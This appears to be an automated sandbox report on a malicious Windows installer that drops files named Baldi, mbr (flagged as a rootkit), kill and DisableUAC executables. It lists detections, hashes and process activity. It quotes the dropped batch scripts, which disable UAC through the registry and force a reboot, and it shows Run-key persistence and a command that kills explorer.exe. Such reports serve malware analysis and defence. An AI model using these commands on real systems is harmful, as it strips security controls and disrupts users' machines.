Default Accounts	1 Scripting	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Modify Registry	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Scripting	NTDS	14 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	73%	ReversingLabs	Win32.Backdoor.DarkComet
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Baldi\Baldi.exe	100%	Avira	TR/BAS.Samca.amdgw
C:\Baldi\kill.exe	100%	Avira	TR/AD.Nekark.sjwrf
C:\Baldi\mbr.exe	100%	Avira	DR/Delphi.Gen
C:\Baldi\kill.exe	100%	Joe Sandbox ML
C:\Baldi\DisableUAC.exe	100%	Joe Sandbox ML
C:\Baldi\Baldi.exe	70%	ReversingLabs	Win32.Trojan.Samca
C:\Baldi\DisableUAC.exe	21%	ReversingLabs	Win64.Trojan.Generic
C:\Baldi\kill.exe	75%	ReversingLabs	Win64.Trojan.Nekark
C:\Baldi\mbr.exe	71%	ReversingLabs	Win32.Rootkit.Abobus

Name	Source	Malicious	Reputation
http://nsis.sf.net/NSIS_Error	file.exe	false	high
http://nsis.sf.net/NSIS_ErrorError	file.exe	false	high
https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-Ang	Baldi.exe, 00000003.00000002.637111077.0000000002E0A000.00000004.00001000.00020000.00000000.sdmp	false	high
https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-A	Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	false	high
https://vk.com/endnet	Baldi.exe, 00000003.00000002.637111077.0000000002EEC000.00000004.00001000.00020000.00000000.sdmp, Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	882703
Start date and time:	2023-06-06 17:15:38 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal92.rans.evad.winEXE@19/8@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.5% (good quality ratio 69.2%) Quality average: 53.3% Quality standard deviation: 39.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:16:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GG.exe C:\Baldi\Baldi.exe
17:16:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GG.exe C:\Baldi\Baldi.exe

Process:	C:\Users\user\Desktop\file.exe
File Type:	Audio file with ID3 version 2.4.0, contains:\012- MPEG ADTS, layer III, v2, 160 kbps, 22.05 kHz, Monaural
Category:	dropped
Size (bytes):	248823
Entropy (8bit):	7.546210558954595
Encrypted:	false
SSDEEP:	6144:+vlzl1lcxbHrXiUl8vr6kSWyYqaaBh6P8IkxR/3t:+vlVQl8vr6LH1B//t
MD5:	6D5F23F17EE8EA50408555EB4BB5BE89
SHA1:	267B0E75E69405B8472654FE7327E4F4D70782B6
SHA-256:	69D1A8275264511E2FB77EAC49F0F64494C2BEB1752AAE347CDFF47CB587C1E4
SHA-512:	50A50A5C42A5C1D44AB42B1BBE5981A0FF6BE6C57AF010B9206E1432516F9589DFC889BC5246F00A595ECD5B879ACF1A1F1059E44662E25827B46384ACB66E0F
Malicious:	false
Preview:	ID3.......TXXX.......major_brand.mp42.TXXX.......minor_version.0.TXXX.......compatible_brands.isommp42.TSSE.......Lavf55.21.100........................Info...........m.............!%'),.2469;=ACEHJMPRUWY]_bdfilnqsvy{~..................................................Lavf55.21.100........$...........................................................................................................................................................................................................................................................................................................................................................................................H....LAME3.99.5UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUULAME3.99.5UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

C:\Baldi\Baldi.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13049579
Entropy (8bit):	5.758905606569735
Encrypted:	false
SSDEEP:	98304:4PyiUHCa1abtUvA5b1PSqhRLuaY673+/4ByCNlFSB+sgpDhsfC2PDORalZLCwpo3:ww2U4tuWbDa9PY
MD5:	515BC425DAA9558E4A12A917E7DFC701
SHA1:	BEF7A2A3F78189922BE2B1F59B9E2636C6A8156E
SHA-256:	FD27FB8B14A5FA99BBA87560510030A5AB9DF47E4F7584CB4D0E31C04E11808B
SHA-512:	41B2B95AEA7ED7BC039F64146581BA695AF8A441CFB7CBA989D2204FE47F8DE974334C224A085F30FBC3FC51455986A73C3BDB90952F1E7BC9B6C8074432DBDC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1]\.................^"........v"......."...@..............................................@....................#.......#.N1....'.......................$.H.....+.......................$.......................#.......#.<....................text...lD"......F"................. ..`.itext..d....`"......J"............. ..`.data...d....."......b".............@....bss.....e... #..........................idata..N1....#..2....".............@....didata.<.....#......*#.............@....edata........#......6#.............@..@.tls....H.....#..........................rdata..].....$......8#.............@..@.reloc..H.....$......:#.............@..B.rsrc.........'......:&.............@..@.debug........+.......+.............@..@................

C:\Baldi\CleanZUpdater.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.528650179702277
Encrypted:	false
SSDEEP:	3:mKDDlR+aRMgACL+aROWuM8AC:hOaSgNiaZRC
MD5:	B54E64A1F0B58D09CF57D983D7BA7361
SHA1:	D6C36454390BE4EEA41512BD39A9C68D77F614BF
SHA-256:	2683D451AB3423E25BCBECA902E6B586D0D9E8689C9C1BB6DCA47BFAE547A7D7
SHA-512:	583A6B07D584A433A78C8A948807CAF5D1BFA0A1B8EF6DCF5A7F67DB38E03BAF875CABDC91F974276295C01485B78C11002B4CF10F08346AB92C2375479BEB0A
Malicious:	false
Preview:	@echo off..Start C:\Baldi\Baldi.exe..Start C:\Baldi\DisableUAC.exe

C:\Baldi\DisableUAC.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	6.27337799955346
Encrypted:	false
SSDEEP:	1536:lD5s9u/O4wppE7b6Ca9wOxibBjPm8YEZDVAguwWx4c6fFSq35t:3s9uWfE7mt+BzXYEZDVAgVWuc69Sq35t
MD5:	9AD923E0B582D7520DBD655C36C1CDD5
SHA1:	189C9B2C40F0A84AF365E0BB8B88E97243560CC3
SHA-256:	F5ADD589DA4BFB1492531306D12E84EF27BFCB0C31FF51FED710215765AC95F4
SHA-512:	EA73A7E5262FD148BC8B5D7D5A7C20A1C6683DEFB7C2EA48CDC22595420307B18CA20ECAF1135AD24131D2AB6CE1346E3ABF78ABED0E2728878C0F993509FB0C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...NK.X........../....2.D...X.................@........................................................................................................(....`..d....................................................................................................code....D.......F.................. ..`.text........`.......J.............. ..`.pdata..d....`.......H..............@..@.rdata...!......."...Z..............@..@.data....*...........\|..............@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Baldi\kill.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	107520
Entropy (8bit):	6.299970440877681
Encrypted:	false
SSDEEP:	1536:pD5s9u/O4wppE7b6Ca9wOxibBjPm8YEZDVAguwWx4c6fFSqF4D:zs9uWfE7mt+BzXYEZDVAgVWuc69SqFc
MD5:	58F681015149CE6C120E5B9F55761D2C
SHA1:	A71E4A2E95493E69D9233C66E096C19B6AFD8147
SHA-256:	C09D5F30C31A01A4E0F8EA829278D8D4E99A20E122EACD7648E5C9C605256290
SHA-512:	0D6746DDF605AC718DC750E6E65131ECDE410B2548616C404D263C4647149DBFEA1922AAEF5277012D90A07B548AC7D9C9EDAB5DE38B54BB9CA8F7C1F1D16457
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...NK.X........../....2.D...\.................@.............................................................................................................`..d....................................................................................................code....D.......F.................. ..`.text........`.......J.............. ..`.pdata..d....`.......H..............@..@.rdata...!......."...Z..............@..@.data....*...........\|..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Baldi\lol.png

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PNG image data, 700 x 394, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	151955
Entropy (8bit):	7.990244705539055
Encrypted:	true
SSDEEP:	3072:dB1lj5X8Ll5YSBw08P47iGR64EjueyjjPQ3FKxu6aSNKkfM7xBTLmtoNDFuSzbDe:f9e5YjN4zR6paM77LPN5uSzb4WG
MD5:	41C46F443E8EE13BFAA86399EB6EE3F8
SHA1:	E1DE323885E86321591D6B31C3354FE2F7236510
SHA-256:	88135E8CED1DDD25E2D92FBC5AB19B5C251CD8FDB8303CF4026EC644A989A8AB
SHA-512:	E638200B40A19FE282DD7F1BA38558BD02D81F7DD10765E0207E2B2F77B9840848C8A9982092D02E76DEA76C12B3EF6DB5C9F8EE896B8AEEA475F9118D32AC18
Malicious:	true
Preview:	.PNG........IHDR..............q.n....sRGB....... .IDATx^.y.de}..9k.Zn.]{_h.........!...3..3...h.8....q...DG.......8.0.D$. .%.,-.....M..........G...NW.{.....y..T../.........8.Q(...B.P.f.q..iDQ..w..}.(.J.......aH...4M...(.....m.....R...}......(..]z.yy.8&.C.0$......0..]..u.M..4-._F...z.82b^a..-..i...eYX..i....a.s...A..y.Q...:.e.8...$.j..u... .0Q(...B.P...I.R..C.....l.m[...100.a...G..TUl.^..E1....!q...\Zr..OYp...b8!..i...@...NtBre!.b+>.....+DWL#..b.\..eY...//.<......uR.P(...B..#..._fbb..W3==M...N.X.T...C.V!.#..b....><.C.=...+.4. .... ..D.X..%X.....S....\1..d.0......%:..d:B.......c..Z..L&.6...]#.....-....W.P(....FH.....V..v...K.2K&.l.2..*G..`..k.A.T ...XhZ...;...X\....F...q.1z..A"..r.+/.,...nZ..d.T.y^I.U......r.X...z.........N..N.F...^.B.P(....M...R..W^E.R.\.3:z..+WR.T...b..A6n<...1;;M..cll..8..3)...T..kNn....m.\9. -.i..sn..tTT.... ..\|.7..`.v[.7-...'.).s.'.by."b+$WNOH../.<n..h.<%.B.P(...kF........3....I..P..=..3..._..v..f..X.....=...........

C:\Baldi\mbr.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	5.173437012266276
Encrypted:	false
SSDEEP:	768:4eMSZqVQuw+qdWSMzKAX9DCn4PLbz5DnNSN4at2bhBXuY8xX:TZqVQcZzXJC2ClktoZxX
MD5:	74E58B34423DDF2A72789D9927C5578D
SHA1:	4F43E0E17BF802CA32A55FCD0612F1A16A14F9DC
SHA-256:	28DEDDCA10A4D9081BDF3BAB9E7E66A53B5DE493B062B1FD124BDF41F386AED1
SHA-512:	6CFC02BF6C46E2219B2A8FEE45D8E537DC86B6563FD6E94FA72ABDAFEDC8B1A1B44A537EFE9BCDA011426585D82AB17E7C8025A1E7A44271A63D8ABE0E904F59
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p...\|.......~............@..........................P......_?...........@................................... ... ......................p...................................................................................CODE.....o.......p.................. ..`DATA.....C.......D...t..............@...BSS......................................idata..............................@....tls.....................................rdata..............................@..P.reloc..p...........................@..P.rsrc.... ... ..."..................@..P.............0......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat

Download File

Process:	C:\Baldi\DisableUAC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	186
Entropy (8bit):	5.385562223264799
Encrypted:	false
SSDEEP:	3:NNgnzKDDEFkhhPk6pdgLxqrZfyM1K7eB/k+7W1nEHfnKyMhF6LFsIlGFIYh9n:NS0QePzYLxiH1jhRiRe66ibFpz
MD5:	A708B066FDA65F8D7F94A2CBD4919B0F
SHA1:	5C723E4F1BA46B5CB6813B5DB490DD63748CB07C
SHA-256:	754D5B111EC7225C4D643142DDF0DFAAB585F12B2F69BCCA088ABBD0D23A5A79
SHA-512:	75B7A6401EBFB2AA9194FF3EF48F8C23044342DDB2F2B9B33020B6EC7592DD2A1B0546EF7387641FB17CCCD7F726FE665386C471F01B4E715D7E9B713BAA1BC5
Malicious:	false
Preview:	@shift /0..@echo off..reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f..shutdown -r -t 1 -c "BALDI EVIL..." >nul..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.989999812901478
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	4444053
MD5:	e2c4c4dd8c6a357eca164955a8fe040c
SHA1:	f4114815bce62efbc78c79f9a83ccf74a4ea075c
SHA256:	f3efe3b57a0f5cc46963dbd8832ceecd5768117685b4cee684b1235d9e74ebe5
SHA512:	389bf398f9f9f6ae7e6dfca835f5877befa4ebfee5938d4b50728d77fb0450b2eb2cb67e3f4d9abaaad77231754968b27c69a510448dfd7f52c63b1ce3a1c3e1
SSDEEP:	98304:3c9jNgez/S9bL+M0QVtYD0JCqfZlVcc9uNSwfrNaSQHbfU0qC:s95zk0mtyTqj6W4SGYSQ/qC
TLSH:	A326338694B17BDBFA050133A1793EA9796BFCE7D54A040A14DEB4E13DF3983026BC91
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^.........

File Icon


Icon Hash:	1da6b3b3a28ecd71

Static PE Info

General

Entrypoint:	0x4030fa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B1AE3CC [Sat Dec 5 22:50:52 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409160h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [0042EC18h], eax
call 00007FF8F0C45416h
mov dword ptr [0042EB64h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 00428F98h
call dword ptr [00407158h]
push 00409154h
push 0042E360h
call 00007FF8F0C450C9h
call dword ptr [004070ACh]
mov edi, 00434000h
push eax
push edi
call 00007FF8F0C450B7h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00434000h], 00000022h
mov dword ptr [0042EB60h], eax
mov eax, edi
jne 00007FF8F0C4282Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00434001h
push dword ptr [esp+14h]
push eax
call 00007FF8F0C44BAAh
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FF8F0C42885h
cmp cl, 00000020h
jne 00007FF8F0C42828h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FF8F0C4281Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74b0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x39000	0x1da18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c4c	0x5e00	False	0.6697140957446809	data	6.440105549497952	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x129c	0x1400	False	0.43359375	data	5.046835307909969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25c58	0x400	False	0.5849609375	data	4.801003752715384	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0xa000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x39000	0x1da18	0x1dc00	False	0.5146320246848739	data	6.109333894738636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x39190	0x1d3a8	Device independent bitmap graphic, 170 x 340 x 32, image size 115600	English	United States
RT_DIALOG	0x56538	0x100	data	English	United States
RT_DIALOG	0x56638	0x11c	data	English	United States
RT_DIALOG	0x56758	0x60	data	English	United States
RT_GROUP_ICON	0x567b8	0x14	data	English	United States
RT_VERSION	0x567d0	0x244	data	Russian	Russia

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Target ID:	0
Start time:	17:16:36
Start date:	06/06/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	4444053 bytes
MD5 hash:	E2C4C4DD8C6A357ECA164955A8FE040C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: cmd.exePID: 5724, Parent PID: 3320

General

Target ID:	1
Start time:	17:16:37
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5744, Parent PID: 5724

General

Target ID:	2
Start time:	17:16:37
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Baldi.exePID: 3156, Parent PID: 5724

General

Target ID:	3
Start time:	17:16:38
Start date:	06/06/2023
Path:	C:\Baldi\Baldi.exe
Wow64 process (32bit):	true
Commandline:	C:\Baldi\Baldi.exe
Imagebase:	0x400000
File size:	13049579 bytes
MD5 hash:	515BC425DAA9558E4A12A917E7DFC701
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 70%, ReversingLabs
Reputation:	low

Analysis Process: DisableUAC.exePID: 7140, Parent PID: 5724

General

Target ID:	4
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Baldi\DisableUAC.exe
Wow64 process (32bit):	false
Commandline:	C:\Baldi\DisableUAC.exe
Imagebase:	0x140000000
File size:	106496 bytes
MD5 hash:	9AD923E0B582D7520DBD655C36C1CDD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000002.380014233.0000000000470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000003.379811354.0000000002370000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000003.379822097.00000000001C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000002.380014233.0000000000448000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Reputation:	low

Analysis Process: conhost.exePID: 5332, Parent PID: 7140

General

Target ID:	5
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskkill.exePID: 5436, Parent PID: 3156

General

Target ID:	6
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\taskkill.exe" /f /im explorer.exe
Imagebase:	0xb10000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 6040, Parent PID: 7140

General

Target ID:	7
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
